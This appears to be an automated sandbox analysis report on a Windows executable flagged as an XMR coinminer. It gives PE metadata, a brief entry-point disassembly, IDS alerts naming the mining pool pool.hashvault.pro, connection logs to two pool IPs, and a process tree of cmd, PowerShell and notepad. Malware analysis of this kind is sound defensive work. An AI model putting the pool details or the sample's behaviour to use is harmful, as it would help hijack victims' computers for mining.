Entrypoint: | 0x4022fa |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED |
DLL Characteristics: | |
Time Stamp: | 0x0 [Thu Jan 1 00:00:00 1970 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | 02549ff92b49cce693542fc9afb10102 |
Instruction |
---|
push ebp |
dec eax |
mov ebp, esp |
dec eax |
sub esp, 00000040h |
dec eax |
mov eax, 00000004h |
add byte ptr [eax], al |
add byte ptr [eax], al |
dec ecx |
mov eax, eax |
mov eax, 00000000h |
dec ecx |
mov ebx, eax |
dec eax |
lea eax, dword ptr [ebp-04h] |
dec ecx |
mov edx, eax |
dec esp |
mov ecx, edx |
dec esp |
mov edx, ebx |
call 00007F85D8BCBF21h |
dec eax |
lea eax, dword ptr [FFFFFF98h] |
dec ecx |
mov edx, eax |
dec esp |
mov ecx, edx |
call 00007F85D8BCBF3Fh |
mov eax, 00000001h |
dec ecx |
mov edx, eax |
dec esp |
mov ecx, edx |
call 00007F85D8BCBF37h |
mov eax, 00030000h |
dec ecx |
mov ebx, eax |
mov eax, 00010000h |
dec ecx |
mov edx, eax |
dec esp |
mov ecx, edx |
dec esp |
mov edx, ebx |
call 00007F85D8BCBF24h |
dec eax |
mov eax, dword ptr [01DB6824h] |
dec eax |
mov ecx, dword ptr [01DB6825h] |
dec eax |
mov edx, dword ptr [01DB6826h] |
dec eax |
mov dword ptr [ebp-10h], eax |
dec eax |
lea eax, dword ptr [ebp-04h] |
dec eax |
mov dword ptr [esp+20h], eax |
mov eax, dword ptr [01DB7C17h] |
dec ecx |
mov ecx, eax |
dec ecx |
mov eax, edx |
dec ecx |
mov ebx, ecx |
dec eax |
mov eax, dword ptr [ebp-10h] |
dec ecx |
mov edx, eax |
dec esp |
mov ecx, edx |
dec esp |
mov edx, ebx |
call 00007F85D8BCBEE9h |
dec eax |
mov eax, dword ptr [01DB67E1h] |
dec eax |
mov ecx, dword ptr [01DB67E2h] |
dec eax |
mov edx, dword ptr [01DB67E3h] |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1db8b30 | 0x3c | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1dbb000 | 0x1f0 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x1dba000 | 0x90 | .pdata |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1db8b6c | 0x90 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x14e0 | 0x1600 | 13853b963b201ea16f713421eaf302fb | False | 0.3283025568181818 | data | 5.435530746793809 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x3000 | 0x1db5d6e | 0x1db5e00 | 5c5669048d44bdd74b60c56a40f08300 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.bss | 0x1db9000 | 0xfac | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.pdata | 0x1dba000 | 0x90 | 0x200 | 833d670d56c423f97067d7571a397b78 | False | 0.17578125 | data | 1.2087156271204966 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.rsrc | 0x1dbb000 | 0x1f0 | 0x200 | 042f8dc0c5470b0dce68fda4d1872eb1 | False | 0.53125 | data | 4.831618991015907 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_MANIFEST | 0x1dbb058 | 0x198 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text | English | United States | 0.553921568627451 |
DLL | Import |
---|---|
msvcrt.dll | malloc, memset, _get_pgmptr, getenv, sprintf, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit |
kernel32.dll | Sleep, CreateProcessA, SetUnhandledExceptionFilter |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-12T14:19:06.623850+0100 | 2826930 | ETPRO COINMINER XMR CoinMiner Usage | 2 | 192.168.2.4 | 49730 | 80.240.16.67 | 443 | TCP |
2025-01-12T14:19:08.414148+0100 | 2036289 | ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) | 2 | 192.168.2.4 | 57699 | 1.1.1.1 | 53 | UDP |
2025-01-12T14:20:10.875041+0100 | 2036289 | ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) | 2 | 192.168.2.4 | 51665 | 1.1.1.1 | 53 | UDP |
- Total Packets: 32
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 12, 2025 14:19:08.425515890 CET | 49730 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:08.425563097 CET | 443 | 49730 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:08.425632000 CET | 49730 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:08.425708055 CET | 49730 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:08.425715923 CET | 443 | 49730 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:08.426218033 CET | 443 | 49730 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:14.421180964 CET | 49731 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:19:14.421278000 CET | 443 | 49731 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:19:14.421372890 CET | 49731 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:19:14.421504021 CET | 49731 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:19:14.421535015 CET | 443 | 49731 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:19:14.421670914 CET | 443 | 49731 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:19:19.452370882 CET | 49733 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:19.452404976 CET | 443 | 49733 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:19.452486992 CET | 49733 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:19.452625990 CET | 49733 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:19.452634096 CET | 443 | 49733 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:19.452780962 CET | 443 | 49733 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:24.483525038 CET | 49739 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:24.483618021 CET | 443 | 49739 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:24.483721972 CET | 49739 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:24.497188091 CET | 49739 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:24.497225046 CET | 443 | 49739 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:24.497502089 CET | 443 | 49739 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:29.530535936 CET | 49740 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:29.530587912 CET | 443 | 49740 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:29.530689001 CET | 49740 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:29.530853987 CET | 49740 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:29.530868053 CET | 443 | 49740 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:29.531131983 CET | 443 | 49740 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:34.608056068 CET | 49741 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:19:34.608150959 CET | 443 | 49741 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:19:34.608226061 CET | 49741 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:19:34.608597994 CET | 49741 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:19:34.608624935 CET | 443 | 49741 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:19:34.608745098 CET | 443 | 49741 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:19:39.649596930 CET | 49742 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:39.649688005 CET | 443 | 49742 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:39.649766922 CET | 49742 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:39.649863005 CET | 49742 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:39.649880886 CET | 443 | 49742 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:39.650091887 CET | 443 | 49742 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:44.686709881 CET | 49743 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:44.686795950 CET | 443 | 49743 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:44.686907053 CET | 49743 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:44.687077045 CET | 49743 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:44.687117100 CET | 443 | 49743 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:44.687258959 CET | 443 | 49743 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:49.733779907 CET | 49744 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:49.733875990 CET | 443 | 49744 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:49.734076977 CET | 49744 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:49.734226942 CET | 49744 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:19:49.734251976 CET | 443 | 49744 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:49.734417915 CET | 443 | 49744 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:19:54.776551962 CET | 49745 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:19:54.776587009 CET | 443 | 49745 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:19:54.776658058 CET | 49745 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:19:54.789866924 CET | 49745 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:19:54.789881945 CET | 443 | 49745 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:19:54.790009022 CET | 443 | 49745 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:00.796072960 CET | 49753 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:00.796161890 CET | 443 | 49753 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:00.796621084 CET | 49753 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:00.805141926 CET | 49753 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:00.805181980 CET | 443 | 49753 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:00.805242062 CET | 443 | 49753 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:05.842875957 CET | 49787 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:20:05.842959881 CET | 443 | 49787 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:20:05.843055010 CET | 49787 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:20:05.843153000 CET | 49787 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:20:05.843173981 CET | 443 | 49787 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:20:05.843357086 CET | 443 | 49787 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:20:10.883552074 CET | 49819 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:10.883565903 CET | 443 | 49819 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:10.883616924 CET | 49819 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:10.883702993 CET | 49819 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:10.883708954 CET | 443 | 49819 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:10.883858919 CET | 443 | 49819 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:15.905391932 CET | 49853 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:15.905452967 CET | 443 | 49853 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:15.905528069 CET | 49853 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:15.914099932 CET | 49853 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:15.914133072 CET | 443 | 49853 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:15.914235115 CET | 443 | 49853 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:20.921058893 CET | 49885 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:20.921148062 CET | 443 | 49885 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:20.921235085 CET | 49885 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:20.921322107 CET | 49885 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:20.921344042 CET | 443 | 49885 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:20.921503067 CET | 443 | 49885 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:25.969124079 CET | 49918 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:25.969217062 CET | 443 | 49918 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:25.969294071 CET | 49918 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:25.972429991 CET | 49918 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:25.972466946 CET | 443 | 49918 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:25.972748995 CET | 443 | 49918 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:30.999187946 CET | 49946 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:30.999248981 CET | 443 | 49946 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:30.999350071 CET | 49946 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:31.009056091 CET | 49946 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:31.009074926 CET | 443 | 49946 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:31.009161949 CET | 443 | 49946 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:36.061723948 CET | 49977 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:36.061747074 CET | 443 | 49977 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:36.061810017 CET | 49977 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:36.061894894 CET | 49977 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:36.061903000 CET | 443 | 49977 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:36.061999083 CET | 443 | 49977 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:41.094238997 CET | 50011 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:41.094253063 CET | 443 | 50011 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:41.094316006 CET | 50011 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:41.094440937 CET | 50011 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:41.094449997 CET | 443 | 50011 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:41.094543934 CET | 443 | 50011 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:46.155685902 CET | 50023 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:46.155786037 CET | 443 | 50023 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:46.155878067 CET | 50023 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:46.164726019 CET | 50023 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:46.164767981 CET | 443 | 50023 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:46.164819956 CET | 443 | 50023 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:51.186750889 CET | 50024 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:51.186805010 CET | 443 | 50024 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:51.186876059 CET | 50024 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:51.186965942 CET | 50024 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:20:51.186976910 CET | 443 | 50024 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:51.187099934 CET | 443 | 50024 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:20:56.218153954 CET | 50025 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:20:56.218225002 CET | 443 | 50025 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:20:56.218312979 CET | 50025 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:20:56.218415976 CET | 50025 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:20:56.218434095 CET | 443 | 50025 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:20:56.218573093 CET | 443 | 50025 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:21:01.264909983 CET | 50026 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:21:01.264995098 CET | 443 | 50026 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:21:01.265084982 CET | 50026 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:21:01.273346901 CET | 50026 | 443 | 192.168.2.4 | 80.240.16.67 |
Jan 12, 2025 14:21:01.273377895 CET | 443 | 50026 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:21:01.273428917 CET | 443 | 50026 | 80.240.16.67 | 192.168.2.4 |
Jan 12, 2025 14:21:06.312091112 CET | 50027 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:21:06.312122107 CET | 443 | 50027 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:21:06.312194109 CET | 50027 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:21:06.312285900 CET | 50027 | 443 | 192.168.2.4 | 192.248.189.11 |
Jan 12, 2025 14:21:06.312292099 CET | 443 | 50027 | 192.248.189.11 | 192.168.2.4 |
Jan 12, 2025 14:21:06.312411070 CET | 443 | 50027 | 192.248.189.11 | 192.168.2.4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 12, 2025 14:19:08.414148092 CET | 57699 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 12, 2025 14:19:08.421493053 CET | 53 | 57699 | 1.1.1.1 | 192.168.2.4 |
Jan 12, 2025 14:20:10.875041008 CET | 51665 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 12, 2025 14:20:10.882807016 CET | 53 | 51665 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Jan 12, 2025 14:19:08.414148092 CET | 192.168.2.4 | 1.1.1.1 | 0x48b9 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Jan 12, 2025 14:20:10.875041008 CET | 192.168.2.4 | 1.1.1.1 | 0x10c1 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jan 12, 2025 14:19:08.421493053 CET | 1.1.1.1 | 192.168.2.4 | 0x48b9 | No error (0) | | | 192.248.189.11 | A (IP address) | IN (0x0001) | false |
Jan 12, 2025 14:19:08.421493053 CET | 1.1.1.1 | 192.168.2.4 | 0x48b9 | No error (0) | | | 80.240.16.67 | A (IP address) | IN (0x0001) | false |
Jan 12, 2025 14:20:10.882807016 CET | 1.1.1.1 | 192.168.2.4 | 0x10c1 | No error (0) | | | 80.240.16.67 | A (IP address) | IN (0x0001) | false |
Jan 12, 2025 14:20:10.882807016 CET | 1.1.1.1 | 192.168.2.4 | 0x10c1 | No error (0) | | | 192.248.189.11 | A (IP address) | IN (0x0001) | false |
Target ID: | 0 |
Start time: | 08:19:02 |
Start date: | 12/01/2025 |
Path: | C:\Users\user\Desktop\9d2h99wrj.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 31'161'344 bytes |
MD5 hash: | 88848246CE109235A762FCD193210CAA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: | |
Reputation: | low |
Has exited: | true |
Target ID: | 1 |
Start time: | 08:19:02 |
Start date: | 12/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: | |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 08:19:04 |
Start date: | 12/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6fc9a0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 08:19:04 |
Start date: | 12/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 08:19:04 |
Start date: | 12/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff788560000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 08:19:05 |
Start date: | 12/01/2025 |
Path: | C:\Windows\System32\notepad.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7c9fc0000 |
File size: | 201'216 bytes |
MD5 hash: | 27F71B12CB585541885A31BE22F61C83 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: | |
Reputation: | moderate |
Has exited: | false |
Target ID: | 7 |
Start time: | 08:19:07 |
Start date: | 12/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff788560000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Execution Graph
Execution Coverage
Dynamic/Packed Code Coverage
Signature Coverage
Execution Coverage: | 56.8% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 0% |
Total number of Nodes: | 12 |
Total number of Limit Nodes: | 0 |
Graph
Callgraph
Control-flow Graph
APIs | |
Memory Dump Source | |
Joe Sandbox IDA Plugin | |
Similarity | |
Control-flow Graph
Strings | |
Memory Dump Source | |
Joe Sandbox IDA Plugin | |
Similarity | |